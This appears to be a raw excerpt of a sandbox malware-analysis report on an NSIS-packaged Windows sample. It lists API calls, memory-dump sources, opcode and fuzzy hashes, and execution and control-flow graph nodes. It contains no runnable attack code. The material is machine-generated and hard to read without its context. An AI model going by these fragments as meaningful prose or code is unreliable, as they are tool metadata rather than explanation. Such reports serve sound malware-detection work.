                                                                  • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                  • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0,00000000), ref: 00405FF0
                                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0,00000000), ref: 00406098
                                                                • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0), ref: 004060A8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                • String ID: P_B
                                                                • API String ID: 3248276644-906794629
                                                                • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                APIs
                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,80000000,00000003), ref: 00405F89
                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,80000000,00000003), ref: 00405F99
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CharPrevlstrlen
                                                                • String ID: C:\Users\user\Desktop
                                                                • API String ID: 2709904686-1246513382
                                                                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                APIs
                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
                                                                • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                • String ID:
                                                                • API String ID: 190613189-0
                                                                • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

                                                                Execution Graph

                                                                Execution Coverage:8.3%
                                                                Dynamic/Decrypted Code Coverage:95.5%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:66
                                                                Total number of Limit Nodes:4
                                                                execution_graph 42218 35c92e08 42219 35c92e4e GetCurrentProcess 42218->42219 42221 35c92e99 42219->42221 42222 35c92ea0 GetCurrentThread 42219->42222 42221->42222 42223 35c92edd GetCurrentProcess 42222->42223 42224 35c92ed6 42222->42224 42225 35c92f13 42223->42225 42224->42223 42226 35c92f3b GetCurrentThreadId 42225->42226 42227 35c92f6c 42226->42227 42228 ad01c 42229 ad034 42228->42229 42230 ad08e 42229->42230 42235 35c9d599 42229->42235 42239 35c9a464 42229->42239 42248 35c9e6f8 42229->42248 42257 35c9d5a8 42229->42257 42236 35c9d5a8 42235->42236 42237 35c9a464 CallWindowProcW 42236->42237 42238 35c9d5ef 42237->42238 42238->42230 42240 35c9a46f 42239->42240 42241 35c9e769 42240->42241 42243 35c9e759 42240->42243 42277 35c9a52c 42241->42277 42261 35c9e95c 42243->42261 42267 35c9e890 42243->42267 42272 35c9e881 42243->42272 42244 35c9e767 42251 35c9e708 42248->42251 42249 35c9e769 42250 35c9a52c CallWindowProcW 42249->42250 42253 35c9e767 42250->42253 42251->42249 42252 35c9e759 42251->42252 42254 35c9e95c CallWindowProcW 42252->42254 42255 35c9e881 CallWindowProcW 42252->42255 42256 35c9e890 CallWindowProcW 42252->42256 42254->42253 42255->42253 42256->42253 42258 35c9d5ce 42257->42258 42259 35c9a464 CallWindowProcW 42258->42259 42260 35c9d5ef 42259->42260 42260->42230 42262 35c9e96a 42261->42262 42263 35c9e91a 42261->42263 42281 35c9e948 42263->42281 42284 35c9e937 42263->42284 42264 35c9e930 42264->42244 42269 35c9e8a4 42267->42269 42268 35c9e930 42268->42244 42270 35c9e948 CallWindowProcW 42269->42270 42271 35c9e937 CallWindowProcW 42269->42271 42270->42268 42271->42268 42274 35c9e890 42272->42274 42273 35c9e930 42273->42244 42275 35c9e948 CallWindowProcW 42274->42275 42276 35c9e937 CallWindowProcW 42274->42276 42275->42273 42276->42273 42278 35c9a537 42277->42278 42279 35c9fbca CallWindowProcW 42278->42279 42280 35c9fb79 42278->42280 42279->42280 42280->42244 42282 35c9e959 42281->42282 42288 35c9fb00 42281->42288 42282->42264 42285 35c9e948 42284->42285 42286 35c9e959 42285->42286 42287 35c9fb00 CallWindowProcW 42285->42287 42286->42264 42287->42286 42289 35c9a52c CallWindowProcW 42288->42289 42290 35c9fb1a 42289->42290 42290->42282 42291 35c9d3f0 42292 35c9d458 CreateWindowExW 42291->42292 42294 35c9d514 42292->42294 42295 35c93050 DuplicateHandle 42296 35c930e6 42295->42296
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PD-5$p=-5$$]q$$]q$$]q$$]q$$]q$$]q
                                                                • API String ID: 0-3091643723
                                                                • Opcode ID: 4135e50d3eaae684e05c4833b182d98f07c7d71782724c47a6b69b99f4f67bac
                                                                • Instruction ID: a88574f90357227a6f51a9435440c2ebf0a3bfa9113b238490d3587cb5b038fd
                                                                • Opcode Fuzzy Hash: 4135e50d3eaae684e05c4833b182d98f07c7d71782724c47a6b69b99f4f67bac
                                                                • Instruction Fuzzy Hash: 8D824934A00619CFDB14DF68C594A9DB7F2FF89304F50C6A9D409AB265EB74ED86CB80

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1491 357cbcd0-357cbce9 1492 357cbceb-357cbcee 1491->1492 1493 357cbcf8-357cbcfb 1492->1493 1494 357cbcf0-357cbcf5 1492->1494 1495 357cbcfd-357cbd06 1493->1495 1496 357cbd18-357cbd1b 1493->1496 1494->1493 1497 357cbd0c-357cbd13 1495->1497 1498 357cbf74-357cbf82 1495->1498 1499 357cbd1d 1496->1499 1500 357cbd2b-357cbd2e 1496->1500 1497->1496 1510 357cbfb9-357cbfce 1498->1510 1511 357cbf84-357cbfab 1498->1511 1505 357cbd23-357cbd26 1499->1505 1501 357cbd30-357cbd4c 1500->1501 1502 357cbd51-357cbd54 1500->1502 1501->1502 1503 357cbf5a-357cbf63 1502->1503 1504 357cbd5a-357cbd5c 1502->1504 1503->1495 1509 357cbf69-357cbf73 1503->1509 1507 357cbd5e 1504->1507 1508 357cbd63-357cbd66 1504->1508 1505->1500 1507->1508 1508->1492 1514 357cbd68-357cbe1c 1508->1514 1530 357cc027-357cc02a 1510->1530 1531 357cbfd0 1510->1531 1513 357cbfad-357cbfb0 1511->1513 1515 357cbfd5-357cbfd8 1513->1515 1516 357cbfb2-357cbfb8 1513->1516 1638 357cbf18-357cbf3c 1514->1638 1639 357cbe22-357cbe2d 1514->1639 1520 357cc15e-357cc167 1515->1520 1521 357cbfde-357cbfe1 1515->1521 1516->1510 1523 357cc16d 1520->1523 1524 357cc007-357cc010 1520->1524 1525 357cc002-357cc005 1521->1525 1526 357cbfe3-357cbffd 1521->1526 1532 357cc172-357cc175 1523->1532 1528 357cc016-357cc01d 1524->1528 1529 357cc1a3-357cc1ba 1524->1529 1525->1524 1527 357cc022-357cc025 1525->1527 1526->1525 1527->1530 1534 357cc02f-357cc032 1527->1534 1528->1527 1544 357cc1bc-357cc1de 1529->1544 1545 357cc1f1-357cc1f3 1529->1545 1530->1534 1531->1515 1535 357cc17f-357cc181 1532->1535 1536 357cc177-357cc17a 1532->1536 1539 357cc03e-357cc041 1534->1539 1540 357cc034-357cc037 1534->1540 1541 357cc188-357cc18b 1535->1541 1542 357cc183 1535->1542 1536->1535 1548 357cc048-357cc04b 1539->1548 1549 357cc043-357cc045 1539->1549 1546 357cc039 1540->1546 1547 357cc052-357cc055 1540->1547 1541->1513 1550 357cc191-357cc1a2 1541->1550 1542->1541 1552 357cc1e0-357cc1e3 1544->1552 1553 357cc265-357cc292 1545->1553 1554 357cc1f5 1545->1554 1546->1539 1547->1529 1556 357cc05b-357cc05f 1547->1556 1548->1540 1555 357cc04d-357cc050 1548->1555 1549->1548 1559 357cc1fa-357cc1fd 1552->1559 1560 357cc1e5-357cc1e7 1552->1560 1591 357cc298-357cc2ba 1553->1591 1592 357cc421-357cc426 1553->1592 1554->1559 1555->1547 1561 357cc064-357cc067 1555->1561 1556->1561 1563 357cc21d-357cc220 1559->1563 1564 357cc1ff-357cc218 1559->1564 1560->1545 1566 357cc06f-357cc072 1561->1566 1567 357cc069-357cc06a 1561->1567 1570 357cc22d-357cc230 1563->1570 1571 357cc222-357cc22c 1563->1571 1564->1563 1568 357cc074-357cc090 1566->1568 1569 357cc095-357cc098 1566->1569 1567->1566 1568->1569 1575 357cc0af-357cc0b2 1569->1575 1576 357cc09a-357cc0a8 1569->1576 1573 357cc232-357cc24e 1570->1573 1574 357cc253-357cc255 1570->1574 1573->1574 1580 357cc25c-357cc25f 1574->1580 1581 357cc257 1574->1581 1582 357cc0bc-357cc0bf 1575->1582 1583 357cc0b4-357cc0b9 1575->1583 1576->1567 1594 357cc0aa 1576->1594 1580->1552 1580->1553 1581->1580 1588 357cc0cc-357cc0cf 1582->1588 1589 357cc0c1-357cc0c7 1582->1589 1583->1582 1595 357cc0e8-357cc0eb 1588->1595 1596 357cc0d1-357cc0e3 1588->1596 1589->1588 1606 357cc42b-357cc435 1591->1606 1607 357cc2c0-357cc2c9 1591->1607 1592->1606 1594->1575 1597 357cc0ed-357cc110 1595->1597 1598 357cc115-357cc118 1595->1598 1596->1595 1597->1598 1604 357cc129-357cc12c 1598->1604 1605 357cc11a-357cc124 1598->1605 1610 357cc12e-357cc154 1604->1610 1611 357cc159-357cc15c 1604->1611 1605->1604 1607->1592 1612 357cc2cf-357cc2d7 1607->1612 1610->1611 1611->1520 1611->1532 1615 357cc40d-357cc419 1612->1615 1616 357cc2dd-357cc2f6 1612->1616 1615->1607 1619 357cc41f 1615->1619 1627 357cc2fc-357cc323 1616->1627 1628 357cc403-357cc408 1616->1628 1619->1606 1627->1628 1634 357cc329-357cc351 1627->1634 1628->1615 1634->1628 1642 357cc357-357cc371 1634->1642 1647 357cbf3e 1638->1647 1648 357cbf46 1638->1648 1645 357cbe2f-357cbe35 1639->1645 1646 357cbe45-357cbf12 call 357c3ee8 1639->1646 1642->1628 1653 357cc377-357cc393 1642->1653 1650 357cbe39-357cbe3b 1645->1650 1651 357cbe37 1645->1651 1646->1638 1646->1639 1647->1648 1648->1503 1650->1646 1651->1646 1653->1628 1659 357cc395-357cc3b4 1653->1659 1659->1628 1664 357cc3b6-357cc401 call 357c3ee8 1659->1664 1664->1615
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0o@p$Dq@p$PH]q
                                                                • API String ID: 0-3731290017
                                                                • Opcode ID: 1c7c15b772d4265583cae1ebf91a49c97231c1767d142c38e580a99bccacd8dc
                                                                • Instruction ID: ef3087984e4afb1bbe6ac0b3ee6851a4d89ab460db80a85f572279dec694f3a8
                                                                • Opcode Fuzzy Hash: 1c7c15b772d4265583cae1ebf91a49c97231c1767d142c38e580a99bccacd8dc
                                                                • Instruction Fuzzy Hash: E2227D34B002058FEB04DB68D894A9DB7E6FF89710F1085A9E41ADF362DB75EC46CB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1985 357cdbf9-357cdbfa 1986 357cdbfc-357cdc02 1985->1986 1987 357cdc31-357cdc32 1985->1987 1988 357cdc39-357cdc5b call 357cd464 call 357cd298 1986->1988 1989 357cdc04-357cdc1a 1986->1989 1987->1988 1998 357cdc5d-357cdc68 1988->1998 1999 357cdc86-357cdcda 1988->1999 1991 357cdc1c-357cdc2a 1989->1991 1992 357cdc7e-357cdc85 1989->1992 1991->1987 2003 357cdc6f-357cdc76 1998->2003 2009 357cdcdc-357cdced 1999->2009 2010 357cdd11-357cdd76 1999->2010 2003->1992 2012 357cdcef-357cdcf1 2009->2012 2013 357cdcf6-357cdd06 2009->2013 2014 357cdf95-357cdf9c 2010->2014 2012->2014 2015 357cdd0d-357cdd0f 2013->2015 2016 357cdd08 2013->2016 2015->2010 2016->2014
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Xaq$$]q
                                                                • API String ID: 0-1280934391
                                                                • Opcode ID: 043b6ca912b2f0033153d584ece7eca1a6e484fd04d55db2bcbd413e217e505e
                                                                • Instruction ID: d555967c5172b3a968a640eb995b19bf11d69ed54738575caae326f36d5740db
                                                                • Opcode Fuzzy Hash: 043b6ca912b2f0033153d584ece7eca1a6e484fd04d55db2bcbd413e217e505e
                                                                • Instruction Fuzzy Hash: 5FB19170F043548FDB09AB78985466E7BA7BFC8750B15896EE416EB384DE38CC068792
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 126e6870f1f24e73fc634458234c328721cee380b182cba0f4dfc6b1b06616da
                                                                • Instruction ID: 056a013588b5556113860c001b3da51a62d7df1db81a778b714200d27840d076
                                                                • Opcode Fuzzy Hash: 126e6870f1f24e73fc634458234c328721cee380b182cba0f4dfc6b1b06616da
                                                                • Instruction Fuzzy Hash: 5653F631C10B5A8ACB55EF68C8905E9F7B1FF99300F11C79AE4587B121EB70AAD5CB81
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42dec40e692963ecbafe8b7df88936b1683572935eb393c18d994fb09710d90c
                                                                • Instruction ID: af3eae1a7e189aab86f1e3fae2cd3d24a56bdd2731c849702953c659c8902cd0
                                                                • Opcode Fuzzy Hash: 42dec40e692963ecbafe8b7df88936b1683572935eb393c18d994fb09710d90c
                                                                • Instruction Fuzzy Hash: 66433F31D1061A8ECB15DF68C8906EDF7B1FF99300F15C6AAE459A7211EB70EAC5CB81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: p=-5
                                                                • API String ID: 0-273782671
                                                                • Opcode ID: 39f3dd3032eaf843b335e0a04a264fcf62479287d6a87cf68a9386edab8e35c2
                                                                • Instruction ID: c3ec914aca4f6c6ab1fd8a94d2444d0fa20c3a3a47fa0955408a262009cd78d2
                                                                • Opcode Fuzzy Hash: 39f3dd3032eaf843b335e0a04a264fcf62479287d6a87cf68a9386edab8e35c2
                                                                • Instruction Fuzzy Hash: 9B627934A002049FDB14DB68D594A9DB7F3FF88356F5084A9E40AEB395DB75EC86CB80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $
                                                                • API String ID: 0-3993045852
                                                                • Opcode ID: aaef83558478025f822c0db16f04def10ebc492678a7f28f15b86ea3461113d9
                                                                • Instruction ID: d8be86b12183c0fc0af7931e4236600f829e0b6f57a34812705cc0c0f4b9931a
                                                                • Opcode Fuzzy Hash: aaef83558478025f822c0db16f04def10ebc492678a7f28f15b86ea3461113d9
                                                                • Instruction Fuzzy Hash: E822BF35E002158BEB14DFA4C980A9EB7B3FB85354F2084A9D44AAF395DB35DD42CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: {24.
                                                                • API String ID: 0-3714660167
                                                                • Opcode ID: 3eb4229fe2dd42719877f6c225b667a0bf32af21d837be0f0bff055e8506747c
                                                                • Instruction ID: 6ce5e05d80b5ea71287c38a11e45c06b57ae0ee77d12ff7d448559fa41274ee3
                                                                • Opcode Fuzzy Hash: 3eb4229fe2dd42719877f6c225b667a0bf32af21d837be0f0bff055e8506747c
                                                                • Instruction Fuzzy Hash: 90E16E34A002058FDB18DF68D5A4AADBBF2EF89310F248479E416E7395DB34ED82CB51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \Vmm
                                                                • API String ID: 0-738080011
                                                                • Opcode ID: 84933fc89a1ba7209887054710ce94d137df713ddccfde2586d62f0f58d96eb0
                                                                • Instruction ID: adb8f750d92aff7d94fa57b60cd942bec39ce399dc0465b21bcf52e0897bc672
                                                                • Opcode Fuzzy Hash: 84933fc89a1ba7209887054710ce94d137df713ddccfde2586d62f0f58d96eb0
                                                                • Instruction Fuzzy Hash: 2F916170E00209DFDF18CFA9C9957EDBBF2AF88714F148139E415A7254EB749986CB82
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3060054cc44d9b24ce67eb953423ad8a7c2bb3194d13dae6a19f5dc465dfd0f6
                                                                • Instruction ID: 551b6aba384ed80aab2457650a761521776f55946d7808ad86999d0c71a9d734
                                                                • Opcode Fuzzy Hash: 3060054cc44d9b24ce67eb953423ad8a7c2bb3194d13dae6a19f5dc465dfd0f6
                                                                • Instruction Fuzzy Hash: 73C2F631D10B1A8ADB54EF68C8805A9F7B1FF99300F11D79AE458B7121EB70AAD5CF81
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: af1ef2ec5cdb5f6ad48af630d74138a50e3b21fd0678321877b1a2e52d6eaf60
                                                                • Instruction ID: cc9ac213292c588137383e106d778eaf4ca6f07e767c208e5625d712e179d8dd
                                                                • Opcode Fuzzy Hash: af1ef2ec5cdb5f6ad48af630d74138a50e3b21fd0678321877b1a2e52d6eaf60
                                                                • Instruction Fuzzy Hash: 10B15E70E042098FDF18CFA9D9857EDBBF2AF88714F148139D419E7294EB749881CB85

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 527 357c8610-357c862e 528 357c8630-357c8633 527->528 529 357c882d-357c8836 528->529 530 357c8639-357c863c 528->530 533 357c883c-357c8846 529->533 534 357c8693-357c869c 529->534 531 357c863e-357c8651 530->531 532 357c8656-357c8659 530->532 531->532 535 357c865b-357c8660 532->535 536 357c8663-357c8666 532->536 537 357c8847-357c8851 534->537 538 357c86a2-357c86a6 534->538 535->536 541 357c8668-357c866c 536->541 542 357c8677-357c867a 536->542 551 357c88cc-357c88d2 537->551 552 357c8853-357c887e 537->552 539 357c86ab-357c86ae 538->539 543 357c86b0-357c86cc 539->543 544 357c86d1-357c86d4 539->544 541->533 546 357c8672 541->546 547 357c867c-357c8689 call 357c1ab4 542->547 548 357c868e-357c8691 542->548 543->544 549 357c86e4-357c86e6 544->549 550 357c86d6-357c86df 544->550 546->542 547->548 548->534 548->539 558 357c86ed-357c86f0 549->558 559 357c86e8 549->559 550->549 554 357c88a4 551->554 555 357c88d4-357c88ea 551->555 557 357c8880-357c8883 552->557 562 357c88a6-357c88a9 554->562 568 357c8add-357c8af0 555->568 569 357c88f0-357c88fc 555->569 561 357c8885-357c88a1 557->561 557->562 558->528 563 357c86f6-357c871a 558->563 559->558 561->554 564 357c88af-357c88cb 562->564 565 357c8b12-357c8b15 562->565 584 357c882a 563->584 585 357c8720-357c872f 563->585 564->551 570 357c8b26-357c8b29 565->570 571 357c8b17-357c8b1b 565->571 574 357c8af2 568->574 588 357c891c-357c8960 569->588 589 357c88fe-357c8917 569->589 576 357c8b38-357c8b3b 570->576 577 357c8b2b 570->577 571->564 575 357c8b21 571->575 574->565 575->570 578 357c8b3d-357c8b47 576->578 579 357c8b48-357c8b4a 576->579 583 357c8b31-357c8b33 577->583 586 357c8b4c 579->586 587 357c8b51-357c8b54 579->587 583->576 584->529 593 357c8747-357c8782 call 357c3ee8 585->593 594 357c8731-357c8737 585->594 586->587 587->557 590 357c8b5a-357c8b64 587->590 605 357c897c-357c89bb 588->605 606 357c8962-357c8974 588->606 589->574 611 357c879a-357c87b1 593->611 612 357c8784-357c878a 593->612 595 357c8739 594->595 596 357c873b-357c873d 594->596 595->593 596->593 613 357c89c1-357c8a9c call 357c3ee8 605->613 614 357c8aa2-357c8ab7 605->614 606->605 624 357c87c9-357c87da 611->624 625 357c87b3-357c87b9 611->625 615 357c878c 612->615 616 357c878e-357c8790 612->616 613->614 614->568 615->611 616->611 630 357c87dc-357c87e2 624->630 631 357c87f2-357c8823 624->631 627 357c87bd-357c87bf 625->627 628 357c87bb 625->628 627->624 628->624 633 357c87e4 630->633 634 357c87e6-357c87e8 630->634 631->584 633->631 634->631
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: hP-5$xK$xK$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                • API String ID: 0-174782968
                                                                • Opcode ID: fa5e09c24ef84f46637e78dea076cba4ec01cf90a5c0e86fed09f38c28dba198
                                                                • Instruction ID: 5d5a455a0acb4607f8f1d3587f4b365653f4d092cfef6da82cd380f037a11b1c
                                                                • Opcode Fuzzy Hash: fa5e09c24ef84f46637e78dea076cba4ec01cf90a5c0e86fed09f38c28dba198
